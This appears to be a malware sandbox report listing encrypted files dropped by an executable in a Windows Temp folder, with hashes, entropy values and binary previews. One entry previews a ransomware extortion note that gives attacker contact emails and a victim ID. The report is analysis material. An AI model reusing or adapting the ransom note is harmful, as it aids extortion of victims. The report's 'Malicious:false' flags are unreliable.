                                                                                                                                            SHA-512:B6C0DAEAEB7C7C9A347E13F0BFD58781C1755CADD9CBDDEB0ED1C2A34A7E471540325C8D52ABAEB17FBF3BA2E93D6F4A15C4411DD7F445EC3E5CA3FB2F34550E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.6&....w..r....ae....'.R/..bI.GM......4..LQ._.j.HS`Mg..B.o..4..6.3 {.,s.SM|..W......ej...........+..../C.0......<..`..8...2:....@...O.-...%V6.........}....r;...~.:..d...G,..)Wd.M.u.C....`..|.."..p&....n.....x*...^..z.K...|.......q)/.L..s.....m......3....]....g....4w.[p.../3l..:j..<@.....:.LiW...:.....\.=...k.m..f......N.M..(.,4H...{mLr.8...W.d..'..9.z..S..oG....H.=.~.7.)...h.....)...G..w..w..p.y.y.R .....&A..b\>.3?.r....c>.P.h...e.....k%T&...]....t..H.E:..<.@3?>.G~.<|.....].x.bd.r..U....B!...'F.....*'.G.u....L...Y.9..F...S<C.....BM.....s..g"i...V..n...y7.Y.r:.=...E~O7.l..xOM.x.'....-."=_...b[C.CX7...v...6..........T.%.'..z}....z.$.......]..7..C1.O.!1!8B.q....Z.m....z..yK......;...*.'.i.,.xN...E..{".N.6..gz.a....,)5.GN..V.f......kV.Lw.l...1.....\..t.....u../.....tYY".I..t..7..e0Lv..K dv ..H|..../...|.{8.....V.Ur.".r..F.^.k?l.+..C..W...H)..q.y[........zl..P\e.x...4U. z.....c.mk.r.J...%9GtG.-6..K....6......+....UC.m..Q.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.858199475940132
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:jsAzYeSoLdsepA61g15OGO8gpSlrzYbr+ujO6oOtBr7MN85blo0zWH:jsWYoJso3S5OGO88SlrvujO6hBpZ5zWH
                                                                                                                                            MD5:02E943B1CCDE4F8347594BBB1582E875
                                                                                                                                            SHA1:48E87C2D264EAF14ECCBC12B2735A095AB55DD77
                                                                                                                                            SHA-256:170398CED788361A8F14BA614604E4121D103CBDDAC957616288CA8E92BEC855
                                                                                                                                            SHA-512:888AA63843B1D9B61BF8062011302B9B3604F4913F98C6145975923963A4FC0698C92F1E241E3134989B9441C3002A2705E7C829067C62BDBB6584A8B9E9E9E5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:F.....aMP;.ZtZ.....K..R...H...[.x.U..J8........B.,c-..b.....)pL ..Z..vQ.Y.......>..N~.Y<..H..D.g......../..Z .L.Pw.._-<. .K...K..`.X.p...r.....Ts...@XGg..!.^..0.....^K.I{..t."V.?#_........5`k..J..h.'.r...!rB..b'..y...Hn4%X.....az.n...QF.))k..&g.",..I.-. X_r..x...{.l....(....Q...i.HR$O..[.^..G....3*P.O...$.....y.p^..... .r.........b3:lA..M..1..D1...%.t.l(rJ~.8....>./H...At..#.\w/.o.P$.Z..d..M4.....5.+.O3.#;z.}u...[.7*.m.....K....y?.J.........w8..A.\....[..jd._..=..Z6,'.O.....+-.FJ[...m...v`Y..\...Rr..B...V! .z.......Fr...p(...*.J.&H.....(A.f.T#r.I.A..w....d....8.^.*.e%f.. ...lz.s..o..Ca..&.......TM.)hc......w.o.xU..g....8.T....P..$...)Z...W.Z,E.../.../..wD].Y....fY.g.5=.l..;Y.T.j.G.?..\..SWw.s....4....l4q..e..5 ......F.i...r.YQGa~.......X...`.T.#K...[Y....>U....=...Y....*./tV8.8.r...3....Us.{..o.G..|.^.J.....oG.*.pZ..c.Sh,6Ic/b...?*..ie.-,.!3.._..0.#.W..g....<B.....\.5.X._........a...<....l.o....\...'Hi.U..o.y..SE...N.W<X..p.7..-).v..hvBE'+...$
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.858199475940132
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:jsAzYeSoLdsepA61g15OGO8gpSlrzYbr+ujO6oOtBr7MN85blo0zWH:jsWYoJso3S5OGO88SlrvujO6hBpZ5zWH
                                                                                                                                            MD5:02E943B1CCDE4F8347594BBB1582E875
                                                                                                                                            SHA1:48E87C2D264EAF14ECCBC12B2735A095AB55DD77
                                                                                                                                            SHA-256:170398CED788361A8F14BA614604E4121D103CBDDAC957616288CA8E92BEC855
                                                                                                                                            SHA-512:888AA63843B1D9B61BF8062011302B9B3604F4913F98C6145975923963A4FC0698C92F1E241E3134989B9441C3002A2705E7C829067C62BDBB6584A8B9E9E9E5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:F.....aMP;.ZtZ.....K..R...H...[.x.U..J8........B.,c-..b.....)pL ..Z..vQ.Y.......>..N~.Y<..H..D.g......../..Z .L.Pw.._-<. .K...K..`.X.p...r.....Ts...@XGg..!.^..0.....^K.I{..t."V.?#_........5`k..J..h.'.r...!rB..b'..y...Hn4%X.....az.n...QF.))k..&g.",..I.-. X_r..x...{.l....(....Q...i.HR$O..[.^..G....3*P.O...$.....y.p^..... .r.........b3:lA..M..1..D1...%.t.l(rJ~.8....>./H...At..#.\w/.o.P$.Z..d..M4.....5.+.O3.#;z.}u...[.7*.m.....K....y?.J.........w8..A.\....[..jd._..=..Z6,'.O.....+-.FJ[...m...v`Y..\...Rr..B...V! .z.......Fr...p(...*.J.&H.....(A.f.T#r.I.A..w....d....8.^.*.e%f.. ...lz.s..o..Ca..&.......TM.)hc......w.o.xU..g....8.T....P..$...)Z...W.Z,E.../.../..wD].Y....fY.g.5=.l..;Y.T.j.G.?..\..SWw.s....4....l4q..e..5 ......F.i...r.YQGa~.......X...`.T.#K...[Y....>U....=...Y....*./tV8.8.r...3....Us.{..o.G..|.^.J.....oG.*.pZ..c.Sh,6Ic/b...?*..ie.-,.!3.._..0.#.W..g....<B.....\.5.X._........a...<....l.o....\...'Hi.U..o.y..SE...N.W<X..p.7..-).v..hvBE'+...$
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.841625825647759
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:8kyFhv0U2SYGxfV5uOno5dsMFY3UzYwUQkd4mmNrjxE1xe/Goj9gvm7l:Qn0dSNxt5Rcc3UMQkdXmHE12vgvm7l
                                                                                                                                            MD5:FB73290A32E64229581A62AE03F40B0B
                                                                                                                                            SHA1:611BE38FB20190BEA19E07741580817C3FFF74E1
                                                                                                                                            SHA-256:C178F30632D62FFAA9449AF7149D2ECE45872C3F2F7568280851F9B162FF0B71
                                                                                                                                            SHA-512:3C17ACC3FFCB331B31B17176A040D6AF1D8066974564A97CDE21EAB268ED3FACE42B5F29B0188EEF294E621F24FB22E8179F84866A123CC12CA51FC214F84173
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...SE.4....U...q6..2.../.i..].Q<....6.(..l.......9w..r...+0U..8.....7.y..5.1.A.<.4...63....M...=".....-...!.........B!E...L.Al....k}.....3.8..BJ....@^./....c+N..@......4Xy..i......l...B.F...'.3../.A.f2.l.qm...c..O(...O.........%......T.9.O.ZJk....B.1...>.9%.....>6.'.W,X.....M#u....g..fco.2Y3...^>...dV.....\.U.SwX..W,g...L;.{....Y.:g,..:\.....!...P]....jn];CF.....ufr.}1..e6..q..K..o:../T.E0`..lO.3..Q.k#@;....na,.O........0........$n.C...KYo.77..S.....o(..B.E/.G.......Kw.h%..y.GF.a....YJ;.K.G...uW..m...'6.Vx..l...$.*......195.A..'.....H.....L.....sn=....../.!.y.....Gh l.0.:x.Tk..P...GO........Y.PY....;..V.x..d......9.R.....T..XN..U0...X.......=\/....a..f.#.r[........u.....n..l.~5M..tb.k:.cY.wR.4....../.......n...E.N}.8.g..<...dH.>5|..2$.VT.b$...dg..$.p...K......}....0.!I..=$....;.nWW.d.o)7...U..~*HO....u....M.%3..g.,\j...L....?.....].....1..6%>....C.6....X.m..^.0...2xT..d.............$x.;........jo{.2.KT.x..Fg..y.....Ch..r..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.841625825647759
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:8kyFhv0U2SYGxfV5uOno5dsMFY3UzYwUQkd4mmNrjxE1xe/Goj9gvm7l:Qn0dSNxt5Rcc3UMQkdXmHE12vgvm7l
                                                                                                                                            MD5:FB73290A32E64229581A62AE03F40B0B
                                                                                                                                            SHA1:611BE38FB20190BEA19E07741580817C3FFF74E1
                                                                                                                                            SHA-256:C178F30632D62FFAA9449AF7149D2ECE45872C3F2F7568280851F9B162FF0B71
                                                                                                                                            SHA-512:3C17ACC3FFCB331B31B17176A040D6AF1D8066974564A97CDE21EAB268ED3FACE42B5F29B0188EEF294E621F24FB22E8179F84866A123CC12CA51FC214F84173
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...SE.4....U...q6..2.../.i..].Q<....6.(..l.......9w..r...+0U..8.....7.y..5.1.A.<.4...63....M...=".....-...!.........B!E...L.Al....k}.....3.8..BJ....@^./....c+N..@......4Xy..i......l...B.F...'.3../.A.f2.l.qm...c..O(...O.........%......T.9.O.ZJk....B.1...>.9%.....>6.'.W,X.....M#u....g..fco.2Y3...^>...dV.....\.U.SwX..W,g...L;.{....Y.:g,..:\.....!...P]....jn];CF.....ufr.}1..e6..q..K..o:../T.E0`..lO.3..Q.k#@;....na,.O........0........$n.C...KYo.77..S.....o(..B.E/.G.......Kw.h%..y.GF.a....YJ;.K.G...uW..m...'6.Vx..l...$.*......195.A..'.....H.....L.....sn=....../.!.y.....Gh l.0.:x.Tk..P...GO........Y.PY....;..V.x..d......9.R.....T..XN..U0...X.......=\/....a..f.#.r[........u.....n..l.~5M..tb.k:.cY.wR.4....../.......n...E.N}.8.g..<...dH.>5|..2$.VT.b$...dg..$.p...K......}....0.!I..=$....;.nWW.d.o)7...U..~*HO....u....M.%3..g.,\j...L....?.....].....1..6%>....C.6....X.m..^.0...2xT..d.............$x.;........jo{.2.KT.x..Fg..y.....Ch..r..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.85375903216811
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:hzcT24xnOzRdovWiyVUJdydZ6rvAWrIRli6f4VTG0U7CunYnlI02GTg27ObLPf:hw7ER6vWixd4CpsXi6fsTufnYnlj2Egt
                                                                                                                                            MD5:A73E36640565064D21D1BD8CBB6D90DE
                                                                                                                                            SHA1:F672B75DABB74FAACF7764EA332D7F5D2D15727B
                                                                                                                                            SHA-256:39FC3F75E5BE9E36E4086EB4AA38148C4F5AF9DF110CA81868425F6F7C47542F
                                                                                                                                            SHA-512:B50095F7E222FD655DB817C6E6CAF8AFC4B1C19B8C29EC25B1C040CA3D11106F0E90CA8E4592005875B845C9CEB5EDB82097DD2CA8CDB0BB7980E240311678B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:(3I...."..F.\..M.....6..m..>,..x.......?T:.Z..f8.h..Z..?Y..#tj....8Bh.C.t.J....;..X..^:h....B$Y.s.s.I.6c...u....gp..kuvg.5.p!.XA.P.y,.|G.Qbu.k..}.BZ...s..*V........-Eq.st.ws..k.Yd......'.hS..)4.J}..-.(.......ju(....u..((.cn.<!58~.... ..$6...|.Tf..w.|M.d.4....).X....Q.|......_...m.A^..r.5......C.Ov..#.%b.N.....N:.5L....v..Y\A..Id..5FtGl@.:Z......b;.`....js.C.H..5..._...n`.K"rS.........{bF.0).H....E...J...9....i./...t...B@`.~..g..A.t!.........u......Lw`......k+,.1.n.....J...C.I..#.....3.<..i..E...#c.p..>R0.y..h@......6.6d.[h.(...<...G...b5.9.PngD.W%......J..z.T/....*As.Y....X..?y.E..i.@/&X....y.....~.qg@......m....N....^L...W..uY$.....O.D.|X...@..".}.[.....C..9lT....7.....t%..h.H...\v. ....h....*.X..%.....4_..{..A.i..:4"T..2.J>2~.u..2.{..aU..H ..LC....WVS..uL....a.mH7).../...u.\Zi..{Lu..m_..9.=J...Hs.......YeOI3S...haS...*.[....27%...q.........e....`.<T!.....nV..Q.A.P...D..(...D........UA.H..)#.....L...q.....}........h.&..M...1Je.C
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.85375903216811
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:hzcT24xnOzRdovWiyVUJdydZ6rvAWrIRli6f4VTG0U7CunYnlI02GTg27ObLPf:hw7ER6vWixd4CpsXi6fsTufnYnlj2Egt
                                                                                                                                            MD5:A73E36640565064D21D1BD8CBB6D90DE
                                                                                                                                            SHA1:F672B75DABB74FAACF7764EA332D7F5D2D15727B
                                                                                                                                            SHA-256:39FC3F75E5BE9E36E4086EB4AA38148C4F5AF9DF110CA81868425F6F7C47542F
                                                                                                                                            SHA-512:B50095F7E222FD655DB817C6E6CAF8AFC4B1C19B8C29EC25B1C040CA3D11106F0E90CA8E4592005875B845C9CEB5EDB82097DD2CA8CDB0BB7980E240311678B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:(3I...."..F.\..M.....6..m..>,..x.......?T:.Z..f8.h..Z..?Y..#tj....8Bh.C.t.J....;..X..^:h....B$Y.s.s.I.6c...u....gp..kuvg.5.p!.XA.P.y,.|G.Qbu.k..}.BZ...s..*V........-Eq.st.ws..k.Yd......'.hS..)4.J}..-.(.......ju(....u..((.cn.<!58~.... ..$6...|.Tf..w.|M.d.4....).X....Q.|......_...m.A^..r.5......C.Ov..#.%b.N.....N:.5L....v..Y\A..Id..5FtGl@.:Z......b;.`....js.C.H..5..._...n`.K"rS.........{bF.0).H....E...J...9....i./...t...B@`.~..g..A.t!.........u......Lw`......k+,.1.n.....J...C.I..#.....3.<..i..E...#c.p..>R0.y..h@......6.6d.[h.(...<...G...b5.9.PngD.W%......J..z.T/....*As.Y....X..?y.E..i.@/&X....y.....~.qg@......m....N....^L...W..uY$.....O.D.|X...@..".}.[.....C..9lT....7.....t%..h.H...\v. ....h....*.X..%.....4_..{..A.i..:4"T..2.J>2~.u..2.{..aU..H ..LC....WVS..uL....a.mH7).../...u.\Zi..{Lu..m_..9.=J...Hs.......YeOI3S...haS...*.[....27%...q.........e....`.<T!.....nV..Q.A.P...D..(...D........UA.H..)#.....L...q.....}........h.&..M...1Je.C
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.856523397699092
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:7z8rSzLzT7bR77sa4pRmFDd+bB3vz6QBN+ZFtqlM9R6fVJ3HurEGdcBo2+2:HUuPzV7apWDMBfz5QZF0lGg9FOrEscF
                                                                                                                                            MD5:68BAEC3A0D27BA5A05B722B8C1E09358
                                                                                                                                            SHA1:02B8CCDF782152B2B2346915BACA10A30CDEC522
                                                                                                                                            SHA-256:2083A482EC7F71BA8591AFD404B2E72E22E64E38FEF98A4F4781C58E614C6170
                                                                                                                                            SHA-512:60F66280BE7A738401B63CE31711EF329A6A9E0CBED220FB3743556B649B24D9364A2E31AA5A3555110536D0DA8F2AC59BCA103A184B9CA80E5B3B5D98FEB71C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...Q....O...qJ....N..a.Ues._...?......A.@..1Q.....`w..n.. V196.$Hv.A...<."g...g....zP_4BX;.b..d8.6....>...m....;"...&...!;..K..K>'K.....[..'.Vn>.Sn%..<E.....B.QZ.#..'...g(>....Q.....W).+Ig...?..>..d.T7.......y.Vc..<.8K.g..F3..kVj.'...:.X.&.~/.8......8..2^.c...&..|.2'Ko...R...r.#I.k....rC...[.7...Tb.0..X........Uu.....Yc...2|*.OIX..a....)V......7..K.c9.*....{&.d.L.A.w.mf...\..C7..=.........t..EB....t[.]bG...k~n.p.Vo....]s.c.%......tl...$....4.Y....kT.Zf...D....^'...,O.......K.,J..&= *....L9yH.\....o...6l...oc..........g.`.../72......c.}.....U%.....va.4E...caS...H".u&...K....1.+..../..1S......3..}.o.......<.p..1"a..?.o...z.....XVew.....X.<y..mUByH+#IHdT=..\eY.V.Q...s....{[.j.2.q.......&./.X..:{&Uh.....d.......e...ot.i...K...O).#%.zp4......B...ir...~.(c.<h")if.......>r..%Vq.>......Q.|.z6".&.I\;.@}.y.......W.Z...u...\..1X...].h.A.UkT.Cl.x.f]?.=...w`.....r..9.{|X.9.}.7..SJ.].o._......0$..<s......Z<..-.f4..c...s....n...6.......T...ZY~...........
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.856523397699092
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:7z8rSzLzT7bR77sa4pRmFDd+bB3vz6QBN+ZFtqlM9R6fVJ3HurEGdcBo2+2:HUuPzV7apWDMBfz5QZF0lGg9FOrEscF
                                                                                                                                            MD5:68BAEC3A0D27BA5A05B722B8C1E09358
                                                                                                                                            SHA1:02B8CCDF782152B2B2346915BACA10A30CDEC522
                                                                                                                                            SHA-256:2083A482EC7F71BA8591AFD404B2E72E22E64E38FEF98A4F4781C58E614C6170
                                                                                                                                            SHA-512:60F66280BE7A738401B63CE31711EF329A6A9E0CBED220FB3743556B649B24D9364A2E31AA5A3555110536D0DA8F2AC59BCA103A184B9CA80E5B3B5D98FEB71C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...Q....O...qJ....N..a.Ues._...?......A.@..1Q.....`w..n.. V196.$Hv.A...<."g...g....zP_4BX;.b..d8.6....>...m....;"...&...!;..K..K>'K.....[..'.Vn>.Sn%..<E.....B.QZ.#..'...g(>....Q.....W).+Ig...?..>..d.T7.......y.Vc..<.8K.g..F3..kVj.'...:.X.&.~/.8......8..2^.c...&..|.2'Ko...R...r.#I.k....rC...[.7...Tb.0..X........Uu.....Yc...2|*.OIX..a....)V......7..K.c9.*....{&.d.L.A.w.mf...\..C7..=.........t..EB....t[.]bG...k~n.p.Vo....]s.c.%......tl...$....4.Y....kT.Zf...D....^'...,O.......K.,J..&= *....L9yH.\....o...6l...oc..........g.`.../72......c.}.....U%.....va.4E...caS...H".u&...K....1.+..../..1S......3..}.o.......<.p..1"a..?.o...z.....XVew.....X.<y..mUByH+#IHdT=..\eY.V.Q...s....{[.j.2.q.......&./.X..:{&Uh.....d.......e...ot.i...K...O).#%.zp4......B...ir...~.(c.<h")if.......>r..%Vq.>......Q.|.z6".&.I\;.@}.y.......W.Z...u...\..1X...].h.A.UkT.Cl.x.f]?.=...w`.....r..9.{|X.9.}.7..SJ.].o._......0$..<s......Z<..-.f4..c...s....n...6.......T...ZY~...........
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.847685773354298
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:B9oodMFB7r9tGjucLfq94HYk9FTrl8P18/BXgXiHys82HIkua4UuGn:B+odY6jXe94YoZm1idg0ytKhb4On
                                                                                                                                            MD5:5CF9EB966349B4D68C8426C07FE34253
                                                                                                                                            SHA1:F7B7440C063CAFE765B9BE7CF17F5712AC3351C4
                                                                                                                                            SHA-256:ED2B9223D5520DA2799039EDA9D30ED52C0A4183E4F3691A70EA13210685B660
                                                                                                                                            SHA-512:6BC3A5F069158ABC23D180BE935DBAEFF6AAA445EEFB06B85C5127C6B716AB60E6FDA8BD375167B9DDA565DCFCE338300455D826D8AA0240115B673051F0B1B1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.H......K$....,......Y..Q......sa.L9.5{.....W...X...C..A...[L..,L..j........s.....K....)..."..X..&Rn:OQ.........%.?6H...... ......Zn'..&..b16@p...rp. ..*d.P.,.;l[...+.^o......O/...A.[.f(..W.w..g@j.V..q.5.^..|.3.d..{...[?.h.&...?I..<u.\>Go.5....).."u...a."..o.......}.o...Z.Z.4.&.(T.S.!3.%.J..&.8..Onw....|.cM.........u.d.; K..9_$D3Q...s+..C......<..8.a....1.k..Gs.<., .]...H......J..p...2T....~I..3.).I.....&.K..F..n....9..<m.Y.4f....X....bn7.S5.r.~.G....}...6Z5@.v.)...D.YP..Bi......j...:.R.G".m.....{..zu_..".x.....n......9U.......P.-.K!.......|d..u~.f.z....8..Z.....#c.@...l..#'y....h...+....>..TT.,...yd..M....._..'A%.V......KYy@.zR U|n..._....$.*....b...5..nQ.+..."Y..@...5y.jr/.E.J......R..WZ.9|J.[.d~I..d'.>,..'{.. {O.Z=.Z`...]1........Z..'5..yr..u........e..Uw........X....".z..u..o;z".A.....;D...Y.VZ..@.)..#z.LQ7..w9.....A8.c...z....G...b)".....l.i.....b.....C..5..v._G.=....1.\........P../...v. .D_.j..=$.....Q.O.....;u.^D.F....e;...}^...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.847685773354298
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:B9oodMFB7r9tGjucLfq94HYk9FTrl8P18/BXgXiHys82HIkua4UuGn:B+odY6jXe94YoZm1idg0ytKhb4On
                                                                                                                                            MD5:5CF9EB966349B4D68C8426C07FE34253
                                                                                                                                            SHA1:F7B7440C063CAFE765B9BE7CF17F5712AC3351C4
                                                                                                                                            SHA-256:ED2B9223D5520DA2799039EDA9D30ED52C0A4183E4F3691A70EA13210685B660
                                                                                                                                            SHA-512:6BC3A5F069158ABC23D180BE935DBAEFF6AAA445EEFB06B85C5127C6B716AB60E6FDA8BD375167B9DDA565DCFCE338300455D826D8AA0240115B673051F0B1B1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.H......K$....,......Y..Q......sa.L9.5{.....W...X...C..A...[L..,L..j........s.....K....)..."..X..&Rn:OQ.........%.?6H...... ......Zn'..&..b16@p...rp. ..*d.P.,.;l[...+.^o......O/...A.[.f(..W.w..g@j.V..q.5.^..|.3.d..{...[?.h.&...?I..<u.\>Go.5....).."u...a."..o.......}.o...Z.Z.4.&.(T.S.!3.%.J..&.8..Onw....|.cM.........u.d.; K..9_$D3Q...s+..C......<..8.a....1.k..Gs.<., .]...H......J..p...2T....~I..3.).I.....&.K..F..n....9..<m.Y.4f....X....bn7.S5.r.~.G....}...6Z5@.v.)...D.YP..Bi......j...:.R.G".m.....{..zu_..".x.....n......9U.......P.-.K!.......|d..u~.f.z....8..Z.....#c.@...l..#'y....h...+....>..TT.,...yd..M....._..'A%.V......KYy@.zR U|n..._....$.*....b...5..nQ.+..."Y..@...5y.jr/.E.J......R..WZ.9|J.[.d~I..d'.>,..'{.. {O.Z=.Z`...]1........Z..'5..yr..u........e..Uw........X....".z..u..o;z".A.....;D...Y.VZ..@.)..#z.LQ7..w9.....A8.c...z....G...b)".....l.i.....b.....C..5..v._G.=....1.\........P../...v. .D_.j..=$.....Q.O.....;u.^D.F....e;...}^...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.827384508318511
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:BbqP8ARQbJN1dCmy24Lh6RKMu8hPpgnI6OOBWrJiXVmlm/qjsUZ9/2:BbqP8ARQbz1db+L18hBZQArIXQlm/qz2
                                                                                                                                            MD5:AD3AE5B5081EDB5264416BF0FE703F3E
                                                                                                                                            SHA1:D7C888818B04B4D03C6C28D72757714C109ADE93
                                                                                                                                            SHA-256:7FE54D1A5D86FF7989BD7A7E8541FFCCDA69595E2932BBFD21371CDEE8D070F5
                                                                                                                                            SHA-512:FF83DFCEF2D7D33A84236A933B7CCAE7021E4A164C97B8766BCEC35F3112EAEB15F58EFD21903AD8EBE863FEDE0AAB7BA97640EBCD1D1C11A392987F038FC817
                                                                                                                                            Malicious:false
                                                                                                                                            Preview: ....A...._...-..q...&3.J.[....?.N....U..O."......o.JcY...s.{<.{l...M..@.\.,XHCw..._........%C.'s>......t"..#..Uh........q..m=..O...kI.H....Id....I...4T..H.Z.<......J..(.T^...7..2Bk..q.,..8.t.^..E....[85D.0.=.x.3.......[".......B:.!Q...g..{f.g..,.._<.^.Z.R%^...n..W.f7."....-.D3.*6.=.7]a.*...D..|..{....4".l..2..+..md..........+.....e..2.URM2.V..E..2.$y.*....w..'..22t......7.U.K<..)..@a.....,...V.=k.a.8cx]...K._ukRx/....D)f,.4q...x.>.~..l...,;.z..'....-...gR....U..=B..q...(V.Ow-.{X.>SAn..y.$.V"..J../.......~......W..2h..A.t".....>rRye..eC.....Y.=..EN...a.L.+...P.>...."[..6..q.ow'...-Uu..0.P.)T....f...$...q*!..U...J.D~......q..V.[. i...l......6.L.M.r5 .(..-!...2..f+....J.G.A.... \...,....mF.V....=&V.....q.C........2.bg&3.q*).2...w9.|...'..U...Um0%>`.f.........&.^dId...|.r.... ~....2a...M....J..|e....n*..R....}......m..T.km.81..s...J......C;;.....D.....jwt...9.9i.mR.....G....H...*.SC".>.s...*We..D....>~...z......C$p...e.^...N4.m...`....-P..p..Xl.WK
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1292
                                                                                                                                            Entropy (8bit):7.827384508318511
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:BbqP8ARQbJN1dCmy24Lh6RKMu8hPpgnI6OOBWrJiXVmlm/qjsUZ9/2:BbqP8ARQbz1db+L18hBZQArIXQlm/qz2
                                                                                                                                            MD5:AD3AE5B5081EDB5264416BF0FE703F3E
                                                                                                                                            SHA1:D7C888818B04B4D03C6C28D72757714C109ADE93
                                                                                                                                            SHA-256:7FE54D1A5D86FF7989BD7A7E8541FFCCDA69595E2932BBFD21371CDEE8D070F5
                                                                                                                                            SHA-512:FF83DFCEF2D7D33A84236A933B7CCAE7021E4A164C97B8766BCEC35F3112EAEB15F58EFD21903AD8EBE863FEDE0AAB7BA97640EBCD1D1C11A392987F038FC817
                                                                                                                                            Malicious:false
